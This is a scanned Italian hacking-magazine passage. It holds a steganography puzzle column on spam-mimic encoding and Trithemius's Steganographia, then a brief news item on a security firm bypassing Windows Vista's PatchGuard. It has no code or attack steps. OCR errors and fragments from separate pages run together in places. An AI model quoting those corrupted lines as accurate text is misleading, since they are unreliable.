CH you - act now ! Sign up a friend and 
you'll get a discount of 50% . Thanks . 
Sembra spam a chiunque, ma non lo è. 
Qual è il messaggio nascosto? Per co¬ 
modità: la versione digitale del testo è 
a http://snipurl.com/10j42. In fondo alla 
pagina c’è un aiutino. 

Per geni: nascosto in Steganographia 
di Tritemio si trova un messaggio segre¬ 
to che inizia così: 

PARAMESIEL OSHURMI DELMUSON 
THAFLOIN PEANO CHARUSTREA 
MELANY LYAMUNTO... 

La soluzione dell’enigma è questa: 
Sum tali cautela ut... 

Qual è la chiave utilizzata dall’abate? 
Ma la vera sfida è creare un enigma 
con lo stesso sistema? È DIFFICILE! 



ue parole: spam mimic (imitatore di 
spam). Non basta? Siamo qua! :-) 


Per super hacker: scrivete un pro¬ 
gramma che applica la codifica segre¬ 
ta del Terzo Libro della Steganographia 
di Tritemio! Occhio agli aiutini... 

Barg thè Gnoll 
gnoll@hackerjoumal. it 


I TRITEMIO m 

i pixit r 

Q uesto è ciò che ho fatto e che. alle 
persone istruite e a quelle profon¬ 
damente interessate allo studio della 
magia, potrebbe, per Grazia di Dio, ri¬ 
sultare almeno parzialmente comprensi¬ 
bile mentre, d'altro canto, ai mangiarape 
dalla pelle indurita potrebbe restare per 
sempre un segreto nascosto, ed essere 
per le loro pigre intelligenze un libro si¬ 
gillato. per sempre. 

Tritemio, Steganographia. prefazione al 
Libro III 
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indows svista è tanto atteso quanto sfortunato. Il nuovo sistema operativo di Microsoft sembra presenta¬ 
re una gran quantità di problemi di vario tipo, bachi e falle assortite. L’ultima notizia vuole che prima anco¬ 
ra del suo gran debutto sia stato craccato. 


Come è possibile? Sono in molti a chiederselo (alcuni di quelli che si 
sono dimostrati tra i più perplessi lavorano proprio per Microsoft!). 

Il fatto è che una società di sicurezza, l’Authentium, è riuscita a tro¬ 
vare un modo per aggirare la protezione di PatchGuard, la tecnologia 
di svista concepita per difenderne il kernel da eventuali intrusioni. 

Ma quelli di Authentium non sono certo i cattivi, anzi! Loro dicono di 
averlo fatto per migliorare le difese di svista! Si tratta di un'operazio¬ 
ne che viene svolta a fin di bene... nessuno la sfrutterebbe per qual¬ 
cosa di male... 

Non è vero? 

Pare che per poter potenziare la sicurezza del sistema operativo, alla 
Authentium abbiano deciso che era il caso di installare una serie di 
patch di sistema. 

Ma PatchGuard non lo avrebbe permesso e allora loro hanno inven¬ 
tato un modo per... 



A II sito internet della società di sicurezza che ha 
trovato un modo interessante per potenziare le 
difese di Vista: le mette a dormire! 


auese ni vista: le mene a dormirei riuscire a neutra¬ 

lizzare PatchGuard, 

addormentandolo. Insomma, mettono a dormire il guardiano. 
Installano le loro patch e poi lo risvegliano. Non male eh? So¬ 
stengono che il metodo sia completamente sicuro e indolore e, 
soprattutto, concepito per nobili scopi. 

Certo. 

L'interrogativo è: quanto tempo ci vorrà prima che questo si¬ 
stema approdi in mani sbagliate? Microsoft ovviamente sostie¬ 
ne di aver già preso le precauzioni necessarie a difendere Pa¬ 
tchGuard da questa manomissione ma... 

Noi siamo sicuri che non finirà qui. 



ISSN 1594-5774 



771594 


577001 


60114 


▲ Ancora non è arrivato e già lo craccano... l'elenco dei 
suoi molti problemi aumenta a vista d 'occhio! 




































































